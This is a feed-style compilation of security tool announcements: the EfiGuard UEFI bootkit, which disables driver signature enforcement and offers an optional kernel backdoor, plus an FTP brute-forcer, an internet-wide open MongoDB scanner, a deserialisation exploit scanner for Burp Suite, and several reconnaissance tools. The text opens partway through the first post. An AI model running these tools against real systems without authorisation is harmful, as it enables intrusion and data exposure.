  1. Follow the steps 1 and 2 as above, but do not rename the loader to bootx64.efi. Instead, either use the BIOS-provided shell (if you have one), or download the EDK2 UEFI Shell and rename it to bootx64.efi.
  2. Boot the machine to the UEFI shell.
  3. cd to /EFI/Boot on the correct filesystem and run load EfiGuardDxe.efi to load the driver.
  4. (Optional) Run either Loader.efi or Loader.config.efi from the same directory to boot Windows. You can also continue working in the shell, or exit to go back to the BIOS/boot menu and boot from there.
  5. After boot, apply the DSE fix as above if applicable.

Compilation

Compiling EfiGuardDxe and the loader
EfiGuard requires EDK2 to build. If you don't have EDK2 installed, follow the steps in Getting Started with EDK2 first as the EDK2 build system is fairly complex to set up. This section assumes you have a workspace directory that your WORKSPACE environment variable points to, with a copy of EDK2 checked out in workspace/edk2. Supported compilers are MSVC, Clang, GCC and ICL.
  1. Clone the EfiGuard repository into workspace/edk2/EfiGuardPkg.
  2. Open a prompt or shell that sets up the environment variables for EDK2.
  3. Run build -a X64 -t VS2017 -p EfiGuardPkg/EfiGuardPkg.dsc -b RELEASE, substituting your toolchain for VS2017.
This will produce EfiGuardDxe.efi and Loader.efi in workspace/Build/EfiGuard/RELEASE_VS2017/X64. To build the interactively configurable loader, append -D CONFIGURE_DRIVER=1 to the build command.

Compiling EfiDSEFix
EfiDSEFix requires Visual Studio to build.
  1. Open EfiGuard.sln and build the solution.
The output binary EfiDSEFix.exe will be in Application/EfiDSEFix/bin.
The Visual Studio solution also includes projects for EfiGuardDxe.efi and Loader.efi which can be used with VisualUefi, but these projects are not built by default as they will not link without additional code, and the build output will be inferior (bigger) than what EDK2 produces. Loader.efi will not link at all due to VisualUefi missing UefiBootManagerLib. These project files are thus meant as a development aid only and the EFI files should still be compiled with EDK2. To set up VisualUefi for this purpose, clone the repository into workspace/VisualUefi and open EfiGuard.sln.

Architecture


While EfiGuard is a UEFI bootkit, it did not start out as one. EfiGuard was originally an on-disk patcher running on NT (similar to UPGDSED), intended to test the viability of a disassembler-based aproach, as opposed to using PDB symbols and version-specific signatures. PatchNtoskrnl.c still looks very much like this original design. Only after this approach proved successful, with no modifications to code needed in over a year of Windows updates, did UEFI come into the picture as a way to further improve capabilities and ease of use.
Some of the benefits provided by a bootkit approach include:
  • No on-disk modifications to kernels or bootloaders needed.
  • No need to modify the boot configuration store using bcdedit.
  • No need to patch ImgpValidateImageHash (although this is still optionally done).
  • Ironically, the use of a bootkit allows enabling Secure Boot, provided you own the Platform Key and are able to add your personal certificate to the db store.
The initial incarnation of EfiGuard as a bootkit was an attempt to get dude719's UEFI-Bootkit to work with recent versions of Windows 10, because it had become dated and no longer works on the latest versions (like UPGDSED, often caused by version-sensitive pattern scans). While I did eventually get this to work, I was unsatisfied with the result mostly due to the choice of hooking OslArchTransferToKernel, which as noted above executes in protected mode and after ExitBootServices has been called. Apart from this, I was not satisfied with only being able to patch some versions of Windows 10; I wanted the bootkit to work on every EFI-compatible version of Windows x64 released to date. Because of this, I rewrote the bootkit from scratch with the following aims:
  • To provide patch information at every stage of boot including the kernel patch itself.
  • To increase the number of supported EFI-compatible Windows versions to "all" (at the time of writing).
  • To enable lazy instantiation of the bootkit and optionally a kernel backdoor, achieved by EFI System Table hooks.
A big picture overview of the final EfiGuard boot flow is shown in the diagram above. For the individual component-specific hooks and patches, see EfiGuardDxe/PatchXxx.c in the source files. For driver initialization/unloading and the EFI Boot and Runtime Services hooks, see EfiGuardDxe.c.

Credits


Parameth - This Tool Can Be Used To Brute Discover GET And POST Parameters

$
0
0

This tool can be used to brutediscover GET and POST parameters
Often when you are busting a directory for common files, you can identify scripts (for example test.php) that look like they need to be passed an unknown parameter. This hopefully can help find them.

The -off flag allows you to specify an offset (helps with dynamic pages) so for example, if you were getting alternating response sizes of 4444 and 4448, set the offset to 5 and it will only show the stuff outside the norm.

Installation
virtualenv venv
. ./venv/bin/activate
pip install -u -r requirements.txt

Usage
usage: parameth.py [-h] [-v] [-u URL] [-p PARAMS] [-H HEADER] [-a AGENT]
[-t THREADS] [-off VARIANCE] [-diff DIFFERENCE] [-o OUT]
[-P PROXY] [-x IGNORE] [-s SIZEIGNORE] [-d DATA]
[-i IGMETH] [-c COOKIE] [-T TIMEOUT]

optional arguments:
-h, --help show this help message and exit
-v, --version Version Information
-u URL, --url URL Target URL
-p PARAMS, --params PARAMS
Provide a list of parameters to scan for
-H HEADER, --header HEADER
Add headers in format a:b c:d
-a AGENT, --agent AGENT
Specify a user agent
-t THREADS, --threads THREADS
Specify the number of threads.
-off VARIANCE, --variance VARIANCE
The offset in difference to ignore (if dynamic pages)
-diff DIFFERENCE, --difference DIFFERENCE
Percentage difference in response (recommended 95)
-o OUT, --out OUT Specify output file
-P PROXY, --proxy PROXY
Specify a proxy in the form http|s://[IP]:[PORT]
-x IGNORE, --ignore IGNORE
Specify a status to ignore eg. 404,302...
-s SIZEIGNORE, --sizeignore SIZEIGNORE
Ignore responses of specified size
-d DATA, --data DATA Provide default post data (also taken from provided
url after ?)
-i IGMETH, --igmeth IGMETH
Ignore GET or POST method. Specify g or p
-c COOKIE, --cookie COOKIE
Specify Cookies
-T TIMEOUT, --timeout TIMEOUT
Specify a timeout in seconds to wait between each
reque st

Adding new params from source:
The following regexes might be useful to parse $_GET or $_POST parameters from source:
$> grep -rioP '$_POST[\s*["']\s*\w+\s*["']\s*]' PHPSOURCE | grep -oP '$_POST[\s*["']\s*\w+\s*["']\s*]' | sed -e "s/$_POST[\s*["']//g" -e "s/\s*['"]\s*]//g" | sort -u > /tmp/outfile.txt
$> grep -rioP '$_GET[\s*["']\s*\w+\s*["']\s*]' PHPSOURCE | grep -oP '$_GET[\s*["']\s*\w+\s*["']\s*]' | sed -e "s/$_GET[\s*["']//g" -e "s/\s*['"]\s*]//g" | sort -u > /tmp/outfile.txt


mongoBuster - Hunt Open MongoDB Instances

$
0
0

Hunt Open MongoDB instances!

Features
  • Worlds fastest and most efficient scanner ( Uses Masscan ).
  • Scans entire internet by default, So fire the tool and chill.
  • Hyper efficient - Uses Go-routines which are even lighter than threads.

Pre-Requisites -
  • Go language ( sudo apt install golang )
  • Masscan ( sudo apt install masscan )
  • Tested on Ubuntu & Kali linux

How to install and run -
git clone https://github.com/yashpl/mongoBuster.git
cd mongoBuster
go build mongobuster.go utils.go
sudo ./mongobuster
Note: Run it with sudo as Masscan requires sudo access.

Flags -
FlagDescription
--max-rate= (int)Defines maximum rate at which packets are generated and sent. Default is 100.
--out-file= (string)Name of file to which vulnerable IPs will be exported.
-vDisplay error msgs from non-vulnerable servers

NOTE -
Using ridiculous values for max-rate flag like 10000+ will most likely bring down your own network infrastructure.
Recommended value is to start with --max-rate 500 for consumer Gigabit routers.


Raptor WAF v0.6 - Web Application Firewall using DFA

$
0
0

Raptor is a Web application firewall made in C, uses DFA to block SQL injection, Cross site scripting and path traversal. http://funguscodes.blogspot.com.br/

to run:
$ git clone https://github.com/CoolerVoid/raptor_waf
$ cd raptor_waf; make; bin/raptor
#Note: Don't execute with "cd bin; ./raptor" use full path "bin/raptor" look detail https://github.com/CoolerVoid/raptor_waf/issues/4
Need lib pcre to compile.

Example
Up some HTTPd server at port 80 redirect with raptor to port 8883
$ bin/Raptor -h localhost -p 80 -r 8883 -w 4 -o loglog.txt
Copy vulnerable PHP code to your web server directory
$ cp doc/test_dfa/test.php /var/www/html
Now you can test xss attacks at http://localhost:8883/test.php
Other option to run(now with regex, look file config/regex_rules.txt to edit rules):
$ bin/Raptor -h 127.0.0.1 -p 80 -r 8883 -w 0 -o resultwaf -m pcre

Look the docs
https://github.com/CoolerVoid/raptor_waf/blob/master/doc/raptor.pdf



FTPBruter - A FTP Server Brute Forcing Tool

$
0
0

Brute forcing tool for FTP server. FTPBruter can work in any OS if they have and support Python 3.

Feature
  • Brute force a FTP server with a username or a list of usernames (That's all).

Install and Run on Linux
You have to install Python 3 first:
  • Install Python 3 on Arch Linux and its distros: sudo pacman -S python3
  • Install Python 3 on Debian and its distros: sudo apt install python3
    git clone https://github.com/GitHackTools/FTPBruter
    cd FTPBruter
    python3 ftpbruter.py

Install and Run on Windows
Download and run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.
Download and run Git setup file from Git-scm.com and choose Use Git from Windows Command Propmt.
After that, open PowerShell or Command Propmt and enter these commands:
git clone https://github.com/GitHackTools/FTPBruter
cd FTPBruter
python3 ftpbruter.py
If you don't want to install Git, you can download FTPBruter-master.zip, extract and use it.

Screenshots



Contact to coder

To-do lists
  • Check anonymous login.
  • Auto-change proxy with brute force.


Freddy - Automatically Identify Deserialisation Issues In Java And .NET Applications By Using Active And Passive Scans

$
0
0

A Burp Suite extension to aid in detecting and exploiting serialisation libraries/APIs.
This useful extension was originally developed by Nick Bloor (@nickstadb) for NCC Group and is mainly based on the work of Alvaro Muñoz and Oleksandr Mirosh, Friday the 13th: JSON Attacks, which they presented at Black Hat USA 2017 and DEF CON 25. In their work they reviewed a range of JSON and XML serialisation libraries for Java and .NET and found that many of them support serialisation of arbitrary runtime objects and as a result are vulnerable in the same way as many serialisation technologies are - snippets of code (POP gadgets) that execute during or soon after deserialisation can be controlled using the properties of the serialized objects, often opening up the potential for arbitrary code or command execution.
Further modules supporting more formats including YAML and AMF are also included, based on the paper Java Unmarshaller Security - Turning your data into code execution and tool marshalsec by Moritz Bechler.
This Burp Suite extension implements both passive and active scanning to identify and exploit vulnerable libraries.

Freddy Features

Passive Scanning
Freddy can passively detect the use of potentially dangerous serialisation libraries and APIs by watching for type specifiers or other signatures in HTTP requests and by monitoring HTTP responses for exceptions issued by the target libraries. For example the library FastJson uses a JSON field $types to specify the type of the serialized object.

Active Scanning
Freddy includes active scanning functionality which attempts to both detect and, where possible, exploit affected libraries.
Active scanning attempts to detect the use of vulnerable libraries using three methods: exception-based, time-based, and Collaborator-based.

Exception Based
In exception-based active scanning, Freddy inserts data into the HTTP request that should trigger a known target-specific exception or error message. If this error message is observed in the application's response then an issue is raised.

Time Based
In some cases time-based payloads can be used for detection because operating system command execution is triggered during deserialisation and this action blocks execution until the OS command has finished executing. Freddy uses payloads containing ping [-n|-c] 21 127.0.0.1 in order to induce a time delay in these cases.

Collaborator Based
Collaborator-based payloads work either by issuing a nslookup command to resolve the Burp Suite Collaborator-generated domain name, or by attempting to load remote classes from the domain name into a Java application. Freddy checks for new Collaborator issues every 60 seconds and marks them in the issues list with RCE (Collaborator).

Supported Targets
The following targets are currently supported (italics are new in v2.0):
Java
  • BlazeDS AMF 0 (detection, RCE)
  • BlazeDS AMF 3 (detection, RCE)
  • BlazeDS AMF X (detection, RCE)
  • Burlap (detection, RCE)
  • Castor (detection, RCE)
  • FlexJson (detection)
  • Genson (detection)
  • Hessian (detection, RCE)
  • Jackson (detection, RCE)
  • JSON-IO (detection, RCE)
  • JYAML (detection, RCE)
  • Kryo (detection, RCE)
  • Kryo using StdInstantiatorStrategy (detection, RCE)
  • ObjectInputStream (detection, RCE)
  • Red5 AMF 0 (detection, RCE)
  • Red5 AMF 3 (detection, RCE)
  • SnakeYAML (detection, RCE)
  • XStream (detection, RCE)
  • XmlDecoder (detection, RCE)
  • YAMLBeans (detection, RCE)
.NET
  • BinaryFormatter (detection, RCE)
  • DataContractSerializer (detection, RCE)
  • DataContractJsonSerializer (detection, RCE)
  • FastJson (detection, RCE)
  • FsPickler JSON support (detection)
  • FsPickler XML support (detection)
  • JavascriptSerializer (detection, RCE)
  • Json.Net (detection, RCE)
  • LosFormatter (detection, RCE) - Note not a module itself, supported through ObjectStateFormatter
  • NetDataContractSerializer (detection, RCE)
  • ObjectStateFormatter (detection, RCE)
  • SoapFormatter (detection, RCE)
  • Sweet.Jayson (detection)
  • XmlSerializer (detection, RCE)
Released under agpl-3.0, see LICENSE for more information


Findomain - A Tool That Use Certificate Transparency Logs To Find Subdomains

$
0
0
A tool that use Certificates Transparency logs to find subdomains.

How it works?
It tool doesn't use the common methods for sub(domains) discover, the tool uses Certificate Transparency logs to find subdomains and it method make it tool very faster and reliable. If you want to know more about Certificate Transparency logs, read https://www.certificate-transparency.org/

Installation
If you want to install it, you can do that manually compiling the source or using the precompiled binary.
Manually: You need to have Rust installed in your computer first.
$ git clone https://github.com/Edu4rdSHL/findomain.git
$ cd findomain
$ cargo build --release
$ sudo cp target/release/findomain /usr/bin/
$ findomain
Using the binary:
$ git clone https://github.com/Edu4rdSHL/findomain.git
$ sudo cp findomain/bin/findomain /usr/bin
$ findomain

Usage
You can use the tool in two ways, only discovering the domain name or discovering the domain + the IP address.
Usage:

findomain -i Return the subdomain list with IP address if resolved.
findomain Return the subdomain list without IP address.
findomain -f <file> Return the subdomain list for host specified in a file.
findomain -i -f <file> Return the subdomain list for host specified in a file with IP address if resolved.

Demo



--- Article Removed ---

$
0
0
***
***
*** RSSing Note: Article removed by member request. ***
***

Reverie - Automated Pentest Tools Designed For Parrot Linux

$
0
0

Automated Pentest Tools Designed For Parrot Linux.

this tool will make your basic pentesting task like Information Gathering, Security Auditing, And Reporting so this tool will do every task fully automatic.

Usage Guide
Download / Clone
~# git clone https://github.com/baguswiratmaadi/reverie
Go Inside reverie Dir
~# cd reverie
Give Permission To reverie
~# chmod 777 *.sh
Run reverie without install
~# ./reverie.sh
If you want to install reverie
~# ./install.sh

Changelog
  • 1.0 First Release
  • 1.1 Fixing Error In Nikto Command Line

Pentest Tools Auto Executed With Reverie
  • Whois Lookup
  • DNSwalk
  • Nmap
  • Dmitry
  • Whatweb
  • wafw00f
  • Load Balancing Detector
  • SSLyze
  • TLSSled
  • Automater
  • Nikto
  • And More Tool Soon

Screenshot
this is preview of Reverie Auto Pentest

Tools Preview












Output Result


Report In HTML





Disclaimer
  • Do not scan government and private IT objects without legal permission.
  • Do At Your Own Risk


Viewing all 5854 articles
Browse latest View live


Latest Images

<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>